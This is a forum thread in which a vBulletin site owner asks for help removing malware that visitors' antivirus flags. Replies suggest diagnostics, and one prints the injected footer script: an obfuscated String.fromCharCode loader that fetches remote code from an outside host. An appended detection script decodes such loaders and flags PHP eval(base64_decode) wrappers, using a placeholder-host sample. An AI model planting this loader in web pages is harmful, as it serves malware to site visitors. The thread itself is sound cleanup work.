
dazzled 03-06-2012 02:50 PM

Malware showing on site
 
Hey guys,

My forum members recently reported that when they go to the site (logged in or not), they get a notification that malware has been detected and caught by their antivirus. I use Avast, and have been getting the same issue.

I ran a scan on Sucuri, and these are the results: http://sitecheck.sucuri.net/results/caiqueforum.com

The malware detection that pops up with Avast names this url as the offending subject: "directmarkering12linear.in/in.cgi?walter"

I've searched my site files for the above URL, and not found anything. I'm at a loss, and members are avoiding the site now until the malware has been taken care of.

How can I get rid of this crap?

Max Taxable 03-06-2012 03:13 PM

Try your site on this:

http://www.webpagetest.org/

It will give you a complete picture of every request, all errors, etc. This is likely coming from third party advertising.

Keev 03-06-2012 05:13 PM

Not sure what that tool is supposed to tell ya... doesn't say the location of where to remove infections.... I have looked over the footer files where normally they like to inject a line of code and nothing

dazzled 03-06-2012 10:07 PM

Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.

kh99 03-06-2012 11:05 PM

I'm not an expert on this kind of thing, but: check the plugin manager for any plugins you don't recognize - you could also try disabling plugins and see if that removes the malware (if it does you still need to find the plugin, of course). It wouldn't hurt to re-upload all your vb files (assuming you haven't made any changes to them of course). And there's also this script: https://vborg.vbsupport.ru/showthread.php?t=220967 which recompiles any templates where the compiled version has changed (someone with access to the db can hide stuff in the compiled templates that you'll never see unless you look in the database). That mod is for vb3, but I think it just needs a minor change to work in vb4 (I posted the change in post#74 of that thread).

ETA: oh, also you can run (from the adminCP) Maintenance -> Diagnostics -> Suspect File Versions to make sure there aren't any files on your server that shouldn't be there.

Of course the most important thing is to try to figure out how the stuff got there in the first place or it's likely to happen again after you clean up. At the very least you should change your passwords, I would think.

Max Taxable 03-06-2012 11:12 PM

Quote:

Originally Posted by dazzled (Post 2306960)
Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.

The offending object you posted,
PHP Code:

"directmarkering12linear.in/in.cgi?walter" 

Should be showing in either the waterfall or the detailed breakdown.

Simon Lloyd 03-06-2012 11:34 PM

You have injected code or infected php, at the bottom of your source code you have this
HTML Code:

<script type="text/javascript">
        <!--
                // Main vBulletin Javascript Initialization
                var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
        //-->

        </script>

when it should look like this
HTML Code:

<script type="text/javascript">
        <!--
                // Main vBulletin Javascript Initialization
                vBulletin_init();
        //-->

        </script>

Check your php files for Eval(base64 code
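
Added example, not part of the original thread: the injected footer script above builds its tag name and URL from `String.fromCharCode(...)` lists, which is why a plain-text search of the files for the reported URL finds nothing. This Node.js sketch decodes such runs in template or page source and counts `eval(base64_decode(` wrappers in PHP; the sample inputs, the placeholder host and the function names are constructed for illustration.

```javascript
// Added example: decode String.fromCharCode(...) runs in page or template
// source and flag the ones that hide a URL or a tag name, plus PHP eval wrappers.
const CHARCODE_RE = /String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g;
const PHP_EVAL_RE = /eval\s*\(\s*base64_decode\s*\(/gi;

function decodeCharCodes(source) {
  const findings = [];
  for (const m of source.matchAll(CHARCODE_RE)) {
    const codes = m[1].split(',').map((n) => parseInt(n, 10));
    const text = String.fromCharCode(...codes); // same decoding the browser does
    findings.push({
      offset: m.index,
      text,
      isUrl: /^(?:https?:)?\/\//i.test(text),
      isTagName: /^(?:script|iframe|head|body)$/i.test(text),
    });
  }
  return findings;
}

function scan(name, source) {
  const decoded = decodeCharCodes(source);
  const phpEvalHits = (source.match(PHP_EVAL_RE) || []).length;
  return {
    name,
    decoded,
    hiddenUrls: decoded.filter((f) => f.isUrl).map((f) => f.text),
    phpEvalHits,
    suspicious: phpEvalHits > 0 || decoded.some((f) => f.isUrl || f.isTagName),
  };
}

// Constructed samples (placeholder host, not the one from the thread).
const enc = (s) =>
  `String.fromCharCode(${[...s].map((c) => c.charCodeAt(0)).join(',')})`;
const SAMPLE_FOOTER = [
  `var script=document.createElement(${enc('script')});`,
  `script.src=${enc('http://injected.example.invalid/loader.js')};`,
  `var head=document.getElementsByTagName(${enc('head')})[0];`,
  'head.appendChild(script);vBulletin_init();',
].join('\n');
const CLEAN_FOOTER = 'vBulletin_init();';
const SAMPLE_PHP = '<?php eval(base64_decode("PLACEHOLDER")); ?>';

for (const [name, src] of [['footer', SAMPLE_FOOTER], ['clean', CLEAN_FOOTER], ['php', SAMPLE_PHP]]) {
  const r = scan(name, src);
  console.log(name, r.suspicious, r.hiddenUrls, r.phpEvalHits);
}
```

The same `scan` function can be run over template text exported from the database as well as over files on disk, since both end up in the rendered page.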

